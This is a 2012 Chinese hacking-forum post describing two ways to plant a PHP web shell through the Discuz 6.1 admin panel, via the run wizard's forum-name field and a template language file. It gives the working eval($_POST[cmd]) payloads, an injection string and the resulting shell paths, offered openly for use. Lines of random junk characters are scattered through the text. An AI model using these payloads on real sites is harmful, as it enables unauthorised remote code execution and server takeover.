中国网络渗透测试联盟
标题:
discuz6.1后台拿shell方法
[打印本页]
作者:
admin
时间:
2012-9-13 16:59
标题:
discuz6.1后台拿shell方法
discuz6.1两种方法后台拿shell
- _' R4 i3 m0 G2 u( d
好多朋友说discuz6.1后台不会拿shell,在前段时间这些都是说不公布的东西,我发出来给大家测试一下
& S% r7 i! f. Z
1:
. A1 K5 N! d6 V' n
http://127.0.0.1/discuz/admincp. ... zard&frames=yes
; z. C K5 G6 }" O3 b9 V: w
admincp.php?action=runwizard&frames=yes点击下一步然后再论坛名称的地方插入webshell
# R/ f6 @+ P2 {! o
<?php eval($_POST[cmd]);?>
4 L6 }6 j! v- G
后台webshell地址:
http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
! C9 S P" H7 X
& ^7 O- F5 @0 H1 F* I5 S1 z
0 W$ U. X+ }, H1 Q% R
2:后台模板管理--默认模板套系--详情
4 K9 O! Z7 G% ^) D) {$ ^
templates/default/actions.lang.php
& ?1 H7 a8 ?) u9 s2 m
jhackj\\');eval($_POST[cmd])?>;//
+ O" ?; \" z+ [9 E
4 G& o* W% @+ D- [2 T1 v
利用很简单,聪明的人一看就懂了
欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)
Powered by Discuz! X3.2